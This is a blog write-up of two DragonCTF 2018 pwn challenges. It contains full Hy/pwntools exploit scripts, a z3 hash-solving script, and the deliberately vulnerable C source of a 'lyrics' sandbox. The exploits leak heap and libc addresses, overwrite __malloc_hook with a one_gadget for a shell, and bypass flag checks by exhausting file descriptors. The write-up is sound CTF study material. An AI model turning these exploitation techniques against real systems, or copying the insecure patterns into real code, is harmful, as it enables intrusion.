logo头像

Hacked By Swing

DragonCTF 2018 Pwn Challenges Writeup

DragonCTF 2018 Pwn Challenges Writeup

Yup, I know this is a late writeup... Just.. take it as a record of myself.

FastStorage

As a record, I'm not going to completely analysis the whole challenge.

This challenge is about a quite strange problem of libc abs function, that when argument of this function is 0x80000000, which is a int with no minus counterpart, it will return itself. This is to say abs(0x80000000) == 0x80000000.

Logic

Logic of this challenge is not so trivial, but not complicated. Three operations valid:

  1. add_entry
  2. print_entry
  3. edit_entry

Note that there's no delete_entry or something like that, means there will be no free available.

Two global variabls used, one g_slot_bitmap and one g_slot, which are of int array and pointer array respectively. slot maps are int arrays storing bitmap of struct of particular sizes, and slots are obviously the struct to be allocated out. When doing add_entry, this function is used:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
_DWORD *__fastcall do_add_entry(char *name, char *buf)
{
int hash; // ST1C_4
char v3; // ST18_1
char v4; // ST14_1
int slotnum; // ST1C_4

hash = calc_hash((unsigned __int8 *)name);
v3 = hash2((unsigned __int8 *)name);
v4 = hash3(name);
slotnum = abs(hash) % 0x3E;
assign_slot(slotnum, name, buf);
return assign_slot_id(slotnum, v3, v4);
}

slot_id is the bitmap, I used a wrong name and decided to let it go. When add an entry, slot is assigned to the global pointer array. slots are structure:

1
2
3
4
5
6
struct SlotItem
{
SlotItem *prev;
char *name;
char *buf;
};

Sizes are recorded in the SlotItem pointer itself using left-shifted 48 value, ORing it with the pointer and slot bitmap is operated by this function:

1
2
3
4
5
6
7
8
_DWORD *__fastcall assign_slot_id(int slotnum, char hash2, char hash3)
{
_DWORD *result; // rax

result = g_slot_ident;
g_slot_ident[slotnum] |= (1 << hash2) | (1 << hash3);
return result;
}

And as I mentioned, g_slot_ident is the global bitmap.

Once we know the abs is the problem causer, we know that since the function do_add_entry assumes abs should always be more than or equal to 0, it doens't consider anything about 0x80000000. So we give it a 0x80000000, the slotnum will become -2, which will cause the assign_slot to assign slot to a minus index, thus overlap with bitmap global variable.

Strategy

Knowing the problem, we can decide a way to solve this challenge. Challenge is nearly fully protected, NX, PIE and FULL RELRO, making us impossible to operate on binary image itself. Just as any pwnable challenge would do, we should leak something first.

There is a check function when doing edit, to check if the requesting item is truly there, so we can use it, since the problem let us assigned a SlotItem pointer to slot_id array(bitmap array), thus we can check every bit of the SlotItem pointer.

Then we need to find out how to get every bit pointer, we need data which is sufficient to those conditions. Z3 could help us out.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
"""solve the name to be used for check and initial abs attack
"""
from z3 import *
from base64 import b64encode
import json

def hash1(name):
num = 0x1337
for n in name:
num = num * n + 1
return num

def hash2(name):
num = 0
for i in range(0, len(name), 2):
num ^= ((name[i + 1] << 8) + name[i])
#if len(name) & 1:
# num ^= name[-1]
return ((num >> 10) ^ ((num ^ (num >> 5)) & 0xff)) & 0x1f

def hash3(name):
num = 0
for n in name:
for i in range(8):
num = num + ((n >> i) & 1)
return num & 0x1f

def init(name):
s = Solver()
for n in name:
s.add(n <= 0xff)
s.add(n > 0)
return s

def find_solve(name, s):
if str(s.check()) != 'unsat':
ans = []
mod = s.model()
for n in name:
ans.append(mod[n])
return ans
else:
return None

def get_string(res):
if res is None:
raise Exception('not satisfiable')
return b64encode(bytes(map(lambda x: int(str(x)), res))).decode('UTF-8')

def main():
name = [BitVec('x' + str(i), 32) for i in range(8)]
result = {}

s = init(name)

# Find out initial abs attack sufficient name
s.add(hash1(name) == 0x80000000)
res = find_solve(name, s)
#print(repr(res))
result['initial'] = get_string(res)

result['check'] = []
for i in range(61):
print('number %d' % i)
s = init(name)

hash_res = hash1(name)
hash2_res = hash2(name)
hash3_res = hash3(name)

s.add(hash_res <= 0x7effffff)
s.add(hash_res > 0)
if i < 32:
s.add((hash_res + 2) % 62 == 0)
else:
s.add(hash_res % 62 == 61)
i -= 32
s.add(hash2_res == i)
s.add(hash3_res == i)
res = find_solve(name, s)
result['check'].append(get_string(res))
with open('z3_json.json', 'w') as f:
f.write(json.dumps(result))


if __name__ == '__main__':
main()

With this script, I found out "initial name" which could give us the 0x80000000 value, and all checking value to be used to check every bit of a SlotItem. Thus, we get a heap leak.

After a heap leak, we still need libc leak to give us more power. I just mentioned that there's no free anywhere in this binary, so we have to figure out a way to free some small chunk to get us a libc pointer. This actually is not so difficult for pwnable players, we usually use malloc that a top chunk cannot handle to free a top chunk, this can be done by modifing size of the top chunk.

But do note that I got into trouble when doing this with this assertion in libc..

1
2
3
4
5
6
7
8
9
/*
If not the first time through, we require old_size to be
at least MINSIZE and to have prev_inuse set.
*/

assert ((old_top == initial_top (av) && old_size == 0) ||
((unsigned long) (old_size) >= MINSIZE &&
prev_inuse (old_top) &&
((unsigned long) old_end & (pagesize - 1)) == 0));

I got several segmentation faults, and when do detailed debugging, I found out the reason I got aborted all the time is that I have to make the size modified to pass the page edge check. The topchunk size with addition to its current position should be at the end of a page. Once passed, I got a libc leak.

With those leaks, and ability to modify any bit of a heap pointer, things are getting easy. Just do set some bits, make it point to somewhere we control, put a fake struct there, and we get arbitrary write.

The rest are just trivial things to do, so I'll skip it.

Oh, forgot to mention, I'm really falling in love with lisp lately, and thus I used hy to write my exploit. :) You can also try hylang, with the power of lisp along with Python, nothing could stop us!

Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
(import [pwn [*]])
(import [base64 [b64decode]])
(import json)
(context :os "linux" :arch "amd64" :log_level "debug")

(setv DEBUG 1)
(if DEBUG
(setv p (process "./faststorage"))
(setv p (remote)))

(setv libc (ELF "./libc.so.6"))

(defmacro until [s]
`(.recvuntil p (bytes ~s)))

(defmacro snd [s]
`(.send p ~s))

(defmacro sndl [s]
`(.sendline p ~s))

(defmacro rcvl []
`(.recvline p))

(defmacro info [fmt &rest rest]
;; python2 fuckyou!
(if (= rest (,))
`(.info p ~fmt)
`(.info p (% ~fmt ~@rest))))

(defn add_entry [name size value]
(until ">")
(sndl "1")
(until "Name:")
(snd name)
(until "Size:")
(sndl (str size))
(until "Value:")
(snd value))

(defn print_entry [name]
(until ">")
(sndl "2")
(until "Name:")
(snd name)
(setv content (rcvl))
(if (in b"No such entry" content)
(return None)
(.unrecv p content))
(until b"Value: ")
(setv end_delim b"0. Exit")
(return (cut (until end_delim) 0 (- (len end_delim)))))

(defn edit_entry [name value]
(until ">")
(sndl "3")
(until "Name:")
(snd name)
(until "Value: ")
(snd value))

(defmain [&rest args]
(pause)

;; for alignment later
(for [i (range 2)]
(add_entry "align" 0x400 "alignment only"))
(add_entry "align" 0x200 "alignment only")

;; read out cached z3 results
(with [f (open "./z3_json.json" "r")]
(setv content (.read f)))

(setv json_res (.loads json content))
(setv check (get json_res "check"))

(for [i (range 60)]
(assoc check i (-> (get check i) (b64decode))))

;; prepare for brute force heap address
(for [i (range 12 60)]
(setv name (get check i))
(add_entry name 0x10 (% "check%d" i)))

(setv init_name (-> (get json_res "initial") (b64decode)))
(add_entry init_name 0x10 "dtj0x10")

;; do brute force
(setv heap_addr 0)
(for [i (range 12 60)]
(setv name (get check i))
(unless (is (print_entry name) None)
(setv heap_addr (| heap_addr (<< 1 i)))))

(info "heap addr leak 0x%x" heap_addr)
(setv heap_base (- heap_addr 0x1000))
(setv cur_heap_addr (+ heap_addr 0xd40))
(info "current heap 0x%x" cur_heap_addr)

;; add a fake entry
(setv fakeprev 0)
(setv fakename (.ljust init_name 8 b"\x00"))
;(setv fakenameptr (+ cur_heap_addr 0x38))
(setv fakenameptr (- cur_heap_addr 0x20))
(setv fakesize 0x200)
(setv fakebuf (| (<< fakesize 48) (+ cur_heap_addr 0x70 0x10 0x68)))
(setv fakeentry (+ cur_heap_addr 0x20))

(add_entry
"fake"
0x20 (+ (p64 fakeprev) (p64 fakenameptr) (p64 fakebuf) fakename))

(pause)

(setv differ (^ fakeentry cur_heap_addr))
(info "fake entry @ 0x%x" fakeentry)
(info differ)

(for [i (range 60)]
(if (> (& (<< 1 i) differ) 0)
;; set ith
(do
(info "set %d" i)
(add_entry (get check i) 0x10 "value"))))

;; Now this will overflow to top chunks size
;; We shrink it, to make it possible to be freed when allocating
;; a chunk more than it can handle
(edit_entry init_name (p64 0x1e1))

;; This will free the top chunk
(add_entry "more!" 0x200 "cannot handle this")

;; Now we can leak libc
(setv libc_base
(->
(print_entry init_name)
(cut 0x10 0x18)
(u64)
((fn [leak] (- leak 0x3c4d28)))))

(info "libc base 0x%x" libc_base)

;; change fake entry, to make vulnerable entry to malloc_hook
(setv malloc_hook
(| (<< 0x200 48) (+ libc_base (get libc.symbols b"__malloc_hook"))))
(setv one_gadget (+ libc_base 0x4526a))

(edit_entry "fake" (+ (p64 fakeprev) (p64 fakenameptr) (p64 malloc_hook)))
(pause)
(edit_entry init_name (p64 one_gadget))

(until ">")
(sndl "1")
(sndl "system!")
(until "Size: ")
(sndl "10")

(.interactive p))

Production

This is a good challenge, but due to my stupidness, I failed to solve this during the game..

Intro

A source file is given (It's a little bit long, but for record, I put it here still):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
#include <dirent.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/resource.h>
#include <unistd.h>

#include <cassert>
#include <cstdio>
#include <cstring>
#include <string>
#include <vector>

namespace globals {
std::vector<int> records;
} // namespace globals

static void set_limits() {
struct rlimit rlim;

rlim.rlim_cur = rlim.rlim_max = 0;
setrlimit(RLIMIT_CORE, &rlim);

rlim.rlim_cur = rlim.rlim_max = 2;
setrlimit(RLIMIT_CPU, &rlim);

rlim.rlim_cur = rlim.rlim_max = 64 * 1024;
setrlimit(RLIMIT_FSIZE, &rlim);

rlim.rlim_cur = rlim.rlim_max = 32;
setrlimit(RLIMIT_NOFILE, &rlim);
}

static void welcome() {
printf("Welcome to the Lyrics Explorer!\n");
}

static ssize_t read_line(int fd, char *buffer, size_t size) {
ssize_t bytes_read = 0;
while (size > 0) {
char c;
ssize_t ret = read(fd, &c, 1);

if (ret <= 0) {
break;
} else if (c == '\n') {
*buffer = '\0';
break;
}

*buffer++ = c;
bytes_read++;
size--;
}

return bytes_read;
}

static ssize_t read_line_buffered(int fd, char *buffer, size_t size) {
if (size == 0) {
return -1;
}

ssize_t ret = read(fd, buffer, size - 1);

if (ret <= 0) {
return ret;
}

buffer[ret] = '\0';

for (ssize_t i = 0; i < ret; i++) {
if (buffer[i] == '\0') {
buffer[i] = '.';
} else if (buffer[i] == '\n') {
buffer[i] = '\0';
lseek(fd, -(ret - i - 1), SEEK_CUR);
return i;
}
}

return ret;
}

static int load_int() {
char buffer[32] = { 0 };

ssize_t bytes_read = read_line(STDIN_FILENO, buffer, sizeof(buffer));
if (bytes_read <= 0) {
return 0;
}

return atoi(buffer);
}

static bool sanitize_path(char *buffer) {
if (strstr(buffer, "../") != NULL) {
return false;
}

return true;
}

static bool list_files(const char *path, std::vector<std::string> *files) {
files->clear();

DIR *dir;
struct dirent *ent;
if ((dir = opendir (path)) != NULL) {
while ((ent = readdir (dir)) != NULL) {
if (!strcmp(ent->d_name, ".") || !strcmp(ent->d_name, "..")) {
continue;
}

files->push_back(ent->d_name);
}
closedir (dir);
return true;
} else {
perror ("[-] Error");
return false;
}
}

static bool list_bands() {
std::vector<std::string> bands;
if (!list_files("./data", &bands)) {
return false;
}

for (const auto& band : bands) {
printf("%s\n", band.c_str());
}

return true;
}

static bool list_songs() {
char buffer[32] = { /* zero padding */ };

printf("Band: ");
read_line(STDIN_FILENO, buffer, sizeof(buffer));

// Never trust user input!!
if (!sanitize_path(buffer)) {
printf("[-] Nice try!\n");
return false;
}

char path[48] = "./data/";
strncat(path, buffer, sizeof(path) - 7);

std::vector<std::string> songs;
if (!list_files(path, &songs)) {
return false;
}

for (const auto& song : songs) {
printf("%s\n", song.c_str());
}

return true;
}

static bool open_lyrics() {
// Don't allow opening too many lyrics at once.
if (globals::records.size() >= 16) {
return false;
}

// Load and sanitize user input.
char band[32];
printf("Band: ");
read_line(STDIN_FILENO, band, sizeof(band));

char song[32];
printf("Song: ");
read_line(STDIN_FILENO, song, sizeof(song));

// Hackers these days...
if (!sanitize_path(band) || !sanitize_path(song)) {
printf("[-] Nice try!\n");
return false;
}

// Form the final path of the lyrics in our database.
char path[128];
snprintf(path, sizeof(path), "./data/%s/%s", band, song);

// Open the path, make sure that it's a file (and not e.g. directory), and
// save the file descriptor.
int fd1 = open(path, O_RDONLY);
if (fd1 == -1) {
return false;
}

struct stat st;
if (fstat(fd1, &st) != 0 || !S_ISREG(st.st_mode)) {
return false;
}

globals::records.push_back(fd1);

// Better safe then sorry. Make sure that the path also doesn't point to a
// symbolic link.
int fd2 = open(path, O_RDONLY | O_NOFOLLOW);
if (fd2 == -1) {
printf("[-] Detected attempt to open a symbolic link!\n");

// Some kind of attack detected?
return true;
}
close(fd2);

// Extra check to protect the flag.
if (strstr(path, "flag") != NULL) {
printf("[-] Not today\n");

close(globals::records.back());
globals::records.pop_back();
return false;
}

printf("[+] Opened the lyrics as new record %zu\n",
globals::records.size() - 1);

return true;
}

static bool read_lyrics() {
printf("Record ID: ");
int idx = load_int();

if (idx < 0 || idx >= globals::records.size()) {
return false;
}

char buffer[4096];
ssize_t bytes_read = read_line_buffered(globals::records[idx],
buffer, sizeof(buffer));

// Let's make sure we're not disclosing any sensitive data due to potential
// bugs in the program.
if (bytes_read > 0) {
if (strstr(buffer, "DrgnS")) {
printf("[-] Attack detected and stopped!\n");

assert(close(globals::records[idx]) == 0);
memmove(&globals::records[idx], &globals::records[idx + 1],
(globals::records.size() - idx - 1) * sizeof(int));
globals::records.pop_back();
return true;
}
}

printf("%s\n", buffer);
return true;
}

static bool write_lyrics() {
// This feature is not fully tested, let's hope that it works...

printf("Record ID: ");
int idx = load_int();

if (idx < 0 || idx >= globals::records.size()) {
return false;
}

printf("Data length: ");
int length = load_int();

if (length < 0 || length > 1024) {
return false;
}

char buffer[1024];
printf("Data: ");
size_t bytes_read = read(STDIN_FILENO, buffer, length);

assert(bytes_read == length);

if (write(globals::records[idx], buffer, bytes_read) != bytes_read) {
return false;
}

return true;
}

static bool close_record() {
printf("Record ID: ");
int idx = load_int();

if (idx < 0 || idx >= globals::records.size()) {
return false;
}

close(globals::records[idx]);
memmove(&globals::records[idx], &globals::records[idx + 1],
(globals::records.size() - idx - 1) * sizeof(int));
globals::records.pop_back();

return true;
}

int main() {
// Disable stdout/stderr buffering.
setbuf(stdout, NULL);
setbuf(stderr, NULL);

// Set some safe limits on the resources used by the process.
set_limits();

// Print the welcome message.
welcome();

// Main program loop.
while (1) {
char buffer[32] = { 0 };

printf("Command> ");
read_line(STDIN_FILENO, buffer, sizeof(buffer));

if (!strcmp(buffer, "bands")) {
if (!list_bands()) {
break;
}
} else if (!strcmp(buffer, "songs")) {
if (!list_songs()) {
break;
}
} else if (!strcmp(buffer, "open")) {
if (!open_lyrics()) {
break;
}
} else if (!strcmp(buffer, "read")) {
if (!read_lyrics()) {
break;
}
} else if (!strcmp(buffer, "write")) {
if (!write_lyrics()) {
break;
}
} else if (!strcmp(buffer, "close")) {
if (!close_record()) {
break;
}
} else if (!strcmp(buffer, "exit")) {
break;
} else {
printf("[-] Unknown command\n");
break;
}
}

printf("Bye!\n");

return 0;
}

A basic leaky sandbox is implemented, but no other logic to protect it. The concatenation using snprintf will make it possible to jump to one level up of sandboxed directory, thus give us the ability to readout the flag.

This easy? Of course not! The thing is, it stopped you from reading flag by closing it when "flag" is detected after symblink check, but if it is a symlink, it will be jumped over. And some several ensurence, like no flag prologue can be readout, and the resources are limited.

This is actually a strange point that the resources are limited, since no one can reach the top of the resource limit when you firstly take a look. It actually can't reach the limit with that global variable size check, which ensures we can't have more than 16 files opened, and the resource limits fd opened as 32. And other resouces, I really don't think they are useful.

If you think about it, you'll find out that when you reach the fd limit somehow, the second open will fail no matter if the file is a symlink, thus jump over the flag check. This is the key part, but how to reach the limit?

assertions, твой мать!

This is what I missed during the CTF...

The name of this challenge is production..Which means the binary will be productionally compiled, release compiled, which means.. THE ASSERTIONS ARE ALL GONE!

Without assertion, close record when flag prologue detected WILL NOT CLOSE the fd.. Thus we can reach the limit..

The rest things are simple enough... Once we reach the fd limit, the second open will fail, we will be back without "flag" path check, to bypass the prologue check when reading flag, be noticed there's a uninitialized variable bug there. So we can simply read flag out, and let the second read returns 0, so we can dump out the read content..

Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
(import [pwn [*]])
(require [hy.extra.anaphoric [*]])
(context :os "linux" :arch "amd64" :log_level "debug")

(setv p (process "./lyrics"))

(defmacro until [s]
`(.recvuntil p (bytes ~s)))

(defmacro snd [s]
`(.send p ~s))

(defmacro sndl [s]
`(.sendline p ~s))

(defmacro rcvl []
`(.recvline p))

(defmacro sndlafter [&rest rest]
`(.sendlineafter p ~@rest))

(defmacro info [fmt &rest rest]
;; python2 fuckyou!
(if (= rest (,))
`(.info p ~fmt)
`(.info p (% ~fmt ~@rest))))

(defn cmd [cmd]
(until ">")
(sndl cmd))

(defn bands []
(cmd b"songs"))

(defn songs [band]
(cmd b"songs")
(sndlafter b"Band: " band))

(defn open [band song]
(cmd b"open")
(sndlafter b"Band: " band)
(sndlafter b"Song: " song))

(defn read [idx]
(cmd b"read")
(sndlafter b"ID: " (str idx)))

(defn close [idx]
(cmd b"close")
(sndlafter b"ID: " (str idx)))

(defmain [&rest args]

;; use lyrics binary it self to trigger the reading of flag prologue
(for [i (range 16)]
(open b".." b"lyrics"))


;; read until flag prologue of each binary
;; number 13 is my local compiled version, it may vary when you do with
;; different binary that how many read you need to get to the prologue string
(for [i (range 16)]
(for [j (range 13)]
(read 0)))

;; open until we are close to fd limit
(for [i (range 12)]
(open b"The Beatles" b"Girl"))

;; read out flag
(open b".." b"flag")

;; now we do read flag out, then read it again, second read will return 0,
;; thus the first cached result will be read out
(read 12)
(read 11)

(.interactive p))